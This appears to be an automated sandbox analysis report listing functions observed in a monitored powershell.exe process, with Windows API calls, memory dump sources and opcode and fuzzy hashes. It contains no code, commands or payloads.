                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: bd87183eef75dfbf38894e9d5c14c63725784700fe8e1408cf6f3cb7b4f73fd3
                                                    • Instruction ID: e8ed9e2461b61f8156edb82a7cfae35cd6465ee1a3d1228709e6500941190a47
                                                    • Opcode Fuzzy Hash: bd87183eef75dfbf38894e9d5c14c63725784700fe8e1408cf6f3cb7b4f73fd3
                                                    • Instruction Fuzzy Hash: 62F0AF39504744EFEB20DF06D885766FBA0EF15726F08C09ADD498B716D275A408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01E8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 9f1680259d1f8bedf726f50e111f911c0015c739718753d0e1cc2bedb5456523
                                                    • Instruction ID: 5a3686ebc44cb824927b3c0a45ea90d59df28b847fe599a71a0b516d7b3ea508
                                                    • Opcode Fuzzy Hash: 9f1680259d1f8bedf726f50e111f911c0015c739718753d0e1cc2bedb5456523
                                                    • Instruction Fuzzy Hash: 23F0CD35500740CFEB20EF09D9897AAFBA0EF45625F08C0EBDD0D4BB42D278E504CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01E8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 6d187b975506078f9438afa7207874169b1ae569147fb3463d322d1327a89f9e
                                                    • Instruction ID: 214734242ffda3c7e373564c0792f0040cb3eca3024abbafd3ad0115b0796e4f
                                                    • Opcode Fuzzy Hash: 6d187b975506078f9438afa7207874169b1ae569147fb3463d322d1327a89f9e
                                                    • Instruction Fuzzy Hash: F611A3755093809FD712CF25DC85B96FFE4DF42224F0980EBED498B653D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01E8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 516c92dede1a46ce69d7eed3c0fa88e7d8db4f480098727d92e073bddb8fa0c1
                                                    • Instruction ID: 15103b595dc00a56c4f29e8e70da56ac6fbcbc8f0229d062511418d630711e94
                                                    • Opcode Fuzzy Hash: 516c92dede1a46ce69d7eed3c0fa88e7d8db4f480098727d92e073bddb8fa0c1
                                                    • Instruction Fuzzy Hash: 5B018F75604640DFEB10EF19DC857AAFBA4DF45224F08C4BBDD0D8B642D675A804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AD07F7, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2177085148.0000000002AD0000.00000040.00000040.sdmp, Offset: 02AD0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d89cb76ee25e3db3cb192ec7702163044512db6daede049805516fa3f8832c9
                                                    • Instruction ID: 65e1bfedfef621701e197f35d3176d4fd5ac0c3811861e9be8a179ab53279593
                                                    • Opcode Fuzzy Hash: 1d89cb76ee25e3db3cb192ec7702163044512db6daede049805516fa3f8832c9
                                                    • Instruction Fuzzy Hash: 9D01A2765093806FD712CB16AC41862FFF8DE87570709C49FEC498B612D129A809CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AD081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2177085148.0000000002AD0000.00000040.00000040.sdmp, Offset: 02AD0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d18762fd976814c7f470095cd3e740d38f24806d2e3c1ece63e6280c7275d639
                                                    • Instruction ID: 2e02ed89d822a609c302e8b82218ccd103584c30565182ea18fcbfcfb1be69e5
                                                    • Opcode Fuzzy Hash: d18762fd976814c7f470095cd3e740d38f24806d2e3c1ece63e6280c7275d639
                                                    • Instruction Fuzzy Hash: 4FE092766007008BD750CF0AEC81452F7E4EB84A30B18C07FDC0D8B700E139B504CAA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E823F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166512286.0000000001E82000.00000040.00000001.sdmp, Offset: 01E82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e808b722375ecef6d5969edfe2d737783897bd8e0dec4892985ff74d14712b0f
                                                    • Instruction ID: 107ed322f667d955a69f46c41e3471dddcb83afce66a4d158be239e9f4563938
                                                    • Opcode Fuzzy Hash: e808b722375ecef6d5969edfe2d737783897bd8e0dec4892985ff74d14712b0f
                                                    • Instruction Fuzzy Hash: E0D05B752046814FE7169A1CC154B593BA46F55704F4644F9E944CB663C754E581D110
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E823BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166512286.0000000001E82000.00000040.00000001.sdmp, Offset: 01E82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5bd909864c71ef2acce298e0d5989859f29a33e0b2f2076555e71ff4419c418
                                                    • Instruction ID: a4f2eef5fcb66dad9aeae73fc88daa88f7461b7c75db7603d022ce368204513f
                                                    • Opcode Fuzzy Hash: e5bd909864c71ef2acce298e0d5989859f29a33e0b2f2076555e71ff4419c418
                                                    • Instruction Fuzzy Hash: 45D05E343006828FEB16DA1CC5A4F5D77E4AF40704F0644E8BD048B666C3A4E980C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2812 Parent PID: 2368 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0200ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0200AD37
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 65ac27acf149df1b2bc1251ceadf1e3518bf4ccf1fb67e77ca288545fa75462d
                                                    • Instruction ID: 303ba328b20a0dfdc8890e164e4cd7f31cf97500731f18ac045466b050749247
                                                    • Opcode Fuzzy Hash: 65ac27acf149df1b2bc1251ceadf1e3518bf4ccf1fb67e77ca288545fa75462d
                                                    • Instruction Fuzzy Hash: 5321BF765097849FEB238F25DC44B92BFF4EF06310F08849AE9858B1A3D3319908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0200AD37
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 47eecd2465454de84fd83ceb7c128a3f33904960a1be842d5b42d69d85d865bc
                                                    • Instruction ID: 80062223fc1590f5b6cd09b41d30fde9e6991f516221e3f37b7c14ba26f7c97f
                                                    • Opcode Fuzzy Hash: 47eecd2465454de84fd83ceb7c128a3f33904960a1be842d5b42d69d85d865bc
                                                    • Instruction Fuzzy Hash: F2115E766047049FEB21CF55D884B96FBE4EF04221F08C46AEE4A8B662D731E514DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0200B329
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 5edda893354e5ac89d66be8e2a93d298fa45141ce97543ea3c89756748ff0b83
                                                    • Instruction ID: 2a8375ee2b094937cee1b41941ced929fc00d6649aa062a2e5ea86460f4aa7f5
                                                    • Opcode Fuzzy Hash: 5edda893354e5ac89d66be8e2a93d298fa45141ce97543ea3c89756748ff0b83
                                                    • Instruction Fuzzy Hash: 1611E3310083809FD7228F11DC85F52FFB0EF06214F08808AED844B152C275A508DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0200B329
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 29d67f5da27320165942d0f1e946e9b93b62d448f7d9017b453676add53abe1f
                                                    • Instruction ID: 1a442558abd650ea37da82c4e0597bcb04e4143f1600021fbc3fd67ae4155426
                                                    • Opcode Fuzzy Hash: 29d67f5da27320165942d0f1e946e9b93b62d448f7d9017b453676add53abe1f
                                                    • Instruction Fuzzy Hash: 2201A932400704DFFB218F05D8C5B26FBE0EF08725F18C09AED890B652D376A518EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 794c4a34e1bc657e7f3ea397e8dc06f7925aa1b6407e691aa1be39ebf78c50e0
                                                    • Instruction ID: efad0eec14ddd9910ed6f213f7eb8d78bb29ceeeb3b34830bb152f99ea73e33f
                                                    • Opcode Fuzzy Hash: 794c4a34e1bc657e7f3ea397e8dc06f7925aa1b6407e691aa1be39ebf78c50e0
                                                    • Instruction Fuzzy Hash: FD31396650E3C08FE7138B759C65691BFB4AF43310F0E84DBD884CF1A3D6659809D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: db5863be81ef6e0f5f545072b8863c9a27abffc653c77d90a6c99ac8d9c2e54d
                                                    • Instruction ID: dec0a1c02fd30cc9839264d10f38db56beb443053f778fd08fe9b696861c08b8
                                                    • Opcode Fuzzy Hash: db5863be81ef6e0f5f545072b8863c9a27abffc653c77d90a6c99ac8d9c2e54d
                                                    • Instruction Fuzzy Hash: 1C315075509380AFE722CF65CC45F56BFF8EF05314F09849EE989CB292D365A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 170298da0a68346df7235a6d9a6d0a68f9c29c3895957924b44cb9527d236b9c
                                                    • Instruction ID: 113b63ba62883eb6a42c00d0cea357c60f2cddd80052892a007623a6a0ea60c6
                                                    • Opcode Fuzzy Hash: 170298da0a68346df7235a6d9a6d0a68f9c29c3895957924b44cb9527d236b9c
                                                    • Instruction Fuzzy Hash: A731C875509380AFE712CB25DC45B96BFE8DF06314F0884AAE948CF293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 506ee5fcde6c460273164d0d1065e82986f371336355c235a39b2fe2000ea549
                                                    • Instruction ID: 2044eb83296b331ed3a5d7ac9ff31475d2609d2ab11487e569fe1e7ac4d9b589
                                                    • Opcode Fuzzy Hash: 506ee5fcde6c460273164d0d1065e82986f371336355c235a39b2fe2000ea549
                                                    • Instruction Fuzzy Hash: 5C31B172009380AFE722CB61CC45F96BFB8EF06310F08849BF984DB192D225A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200AFBE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 758f9df3d98fa7e80578b83eb98cac8ead84700622c80e081c7c6e6d799788da
                                                    • Instruction ID: cd2dc01c0d516c061b0b540c647f0fbe05bcef6d06d12f28d4532f7e0011f2df
                                                    • Opcode Fuzzy Hash: 758f9df3d98fa7e80578b83eb98cac8ead84700622c80e081c7c6e6d799788da
                                                    • Instruction Fuzzy Hash: 3721D2B2509380AFE7128F20DC45B96BFB8EF06324F0884DAE984DB193D225A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 1fe4dca68d25b15279b849229944c3a889071ca238ed4cb8c1f79e71532f9179
                                                    • Instruction ID: 3b117e7fe893c017515ab1c68053c775d3b36d3b73718bf7a986662ce9569867
                                                    • Opcode Fuzzy Hash: 1fe4dca68d25b15279b849229944c3a889071ca238ed4cb8c1f79e71532f9179
                                                    • Instruction Fuzzy Hash: 76316F7550E3C06FD3138B358C55B56BFB4AF43610F1A81DBE884CF2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 7e75fc90c47f0f6ae6bc9eb3acb25bf3788f5bb4b9e9684153665d0d39bb29b7
                                                    • Instruction ID: f2027b200f437f9e50d004e8501af75065b746e44e500d738b683975afa17eb9
                                                    • Opcode Fuzzy Hash: 7e75fc90c47f0f6ae6bc9eb3acb25bf3788f5bb4b9e9684153665d0d39bb29b7
                                                    • Instruction Fuzzy Hash: 2F219171509380AFE722CF15CC45FA6BFA8EF46224F0884AAF945DB192D665A908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: a70424a8a6b2ed68c76c053694a1410f2513f7f67f06e8f8ded0a23032aa7a48
                                                    • Instruction ID: d3e22f8b2ede66706092257a71e43c01ceee5e104c7989f77f3a2a8447957c26
                                                    • Opcode Fuzzy Hash: a70424a8a6b2ed68c76c053694a1410f2513f7f67f06e8f8ded0a23032aa7a48
                                                    • Instruction Fuzzy Hash: ED21FC76408784AFE712CB159C45FA3BFA8EF46724F0981DBF9898F193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 3ae7e7c3ca8143bdf72aada1cec58349f74dfe8a653255d91305b0d58f162da8
                                                    • Instruction ID: 02bf84e651350e34bff2ff30799454cd8955d4fcd36af4c59c6e27873c024733
                                                    • Opcode Fuzzy Hash: 3ae7e7c3ca8143bdf72aada1cec58349f74dfe8a653255d91305b0d58f162da8
                                                    • Instruction Fuzzy Hash: FA21717540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 87eed30af6bacdcdd389b838279546bb97b9c7c7c868a33d26a0979444f5559e
                                                    • Instruction ID: 2f3c28295dfd20b96c1937f4c03959345d2117f51c9a0bcf58450efae8eb2337
                                                    • Opcode Fuzzy Hash: 87eed30af6bacdcdd389b838279546bb97b9c7c7c868a33d26a0979444f5559e
                                                    • Instruction Fuzzy Hash: 6D219C79500304EFE720DF65CC85F66FBE8EF08310F04846AE949CA292D332E908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: d832f65dce68c03c11f0804bb68320da94fbc01dd0b1cd95a6d4096ff18500b8
                                                    • Instruction ID: 6973e1fea60d754694066ef2493534641b2c0653275e2c09d2840d7b0c032244
                                                    • Opcode Fuzzy Hash: d832f65dce68c03c11f0804bb68320da94fbc01dd0b1cd95a6d4096ff18500b8
                                                    • Instruction Fuzzy Hash: E8219276409380AFE722CF61DC45F56FFB8EF46314F09849BE9489B153C265A909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0200A94A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 513b641d23f5f69c3d7f3401e585613bcef2f70357d15690e936479a039a0dd4
                                                    • Instruction ID: cbccf6f2bb968da925eb1a704766972e57b998a9ade5f7e9affe4255e8177704
                                                    • Opcode Fuzzy Hash: 513b641d23f5f69c3d7f3401e585613bcef2f70357d15690e936479a039a0dd4
                                                    • Instruction Fuzzy Hash: 4421A77540D780AFD3138B25DC51B62BFB4EF87710F0981DBE8848B653D225A919C7B6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: c63c84f5b9527ec339de8fb77710715c3bd73388d8e65d6117cd51df527b6d27
                                                    • Instruction ID: ee9d2fabb3aa5746db526b03044dbe7f8a0fb4d5821a807d8029d944f1803169
                                                    • Opcode Fuzzy Hash: c63c84f5b9527ec339de8fb77710715c3bd73388d8e65d6117cd51df527b6d27
                                                    • Instruction Fuzzy Hash: A121AE75600344AFF720DF25CC85BA6FBE8EF08314F04856AE848DB282D775F908CA66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200A1BD, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0200A23E
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: f07672031b0aab6a4689b747735fd3545d6dd1f51f821ca4f6fcfcd4da23128d
                                                    • Instruction ID: 54261039f33e68a2c6925c98e028f413548adf8d5eca5e46494d9aed07aa05d7
                                                    • Opcode Fuzzy Hash: f07672031b0aab6a4689b747735fd3545d6dd1f51f821ca4f6fcfcd4da23128d
                                                    • Instruction Fuzzy Hash: 0721D871909381AFD311CB26CC45B66FFB4EF86620F19819FEC488B642D335A515CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200BDBC
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 784618e22e8242ed62b502be8620a9b3cc496767a84ff19a1f1a55045ae26b5a
                                                    • Instruction ID: fc8716da5c41ad6b41c53ea96487ae59f32faf8926078f62ae3287e1a0fbd575
                                                    • Opcode Fuzzy Hash: 784618e22e8242ed62b502be8620a9b3cc496767a84ff19a1f1a55045ae26b5a
                                                    • Instruction Fuzzy Hash: 1D119A72500304EFFB21DF61DC85FAAFBE8EF04324F04856AF9499A281D671A944CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 04eef2a7205cd2cf8fda54c27aa8eb60714a7d9cf59379b166ebf3ca320a81d8
                                                    • Instruction ID: d5f566a7e8a74d48115ca1814c6f88e48aeed5b3c35f0c721c24e1a1ff30668a
                                                    • Opcode Fuzzy Hash: 04eef2a7205cd2cf8fda54c27aa8eb60714a7d9cf59379b166ebf3ca320a81d8
                                                    • Instruction Fuzzy Hash: E9215B7550D3C09FDB128B25DC55B96BFB4AF03224F1D84DAE888CF693D2659908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2182615354.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: f852b728f201d0e17a9b11525b23335d59585cdbb2bedbb52d189d294536259f
                                                    • Instruction ID: 4a43491d3ead11572c6672150ad2cfd208f87bb988b09d83f808fbdf408b0a1a
                                                    • Opcode Fuzzy Hash: f852b728f201d0e17a9b11525b23335d59585cdbb2bedbb52d189d294536259f
                                                    • Instruction Fuzzy Hash: 3921A1765083809FEB21CF25DC45B96FFF4EF06220F0884AEED898B562D335A449DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9B9835CE,00000000,00000000,00000000,00000000), ref: 0200B0AE
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 416bd134b3336a9a3dcc6696029f162c8b5d7f4822d7a2f6e88115a58cd73915
                                                    • Instruction ID: 2738483de155be5d27b7d2c4539afd167550f8e7ee135cf48007731d64be7da7
                                                    • Opcode Fuzzy Hash: 416bd134b3336a9a3dcc6696029f162c8b5d7f4822d7a2f6e88115a58cd73915
                                                    • Instruction Fuzzy Hash: 46117C71600304EFFB21CF15DC85FAABBE8EF44664F14846AE909CB681D674E904CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0200AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0200AB1A
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.2177648025.000000000200A000.00000040.00000001.sdmp, Offset: 0200A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
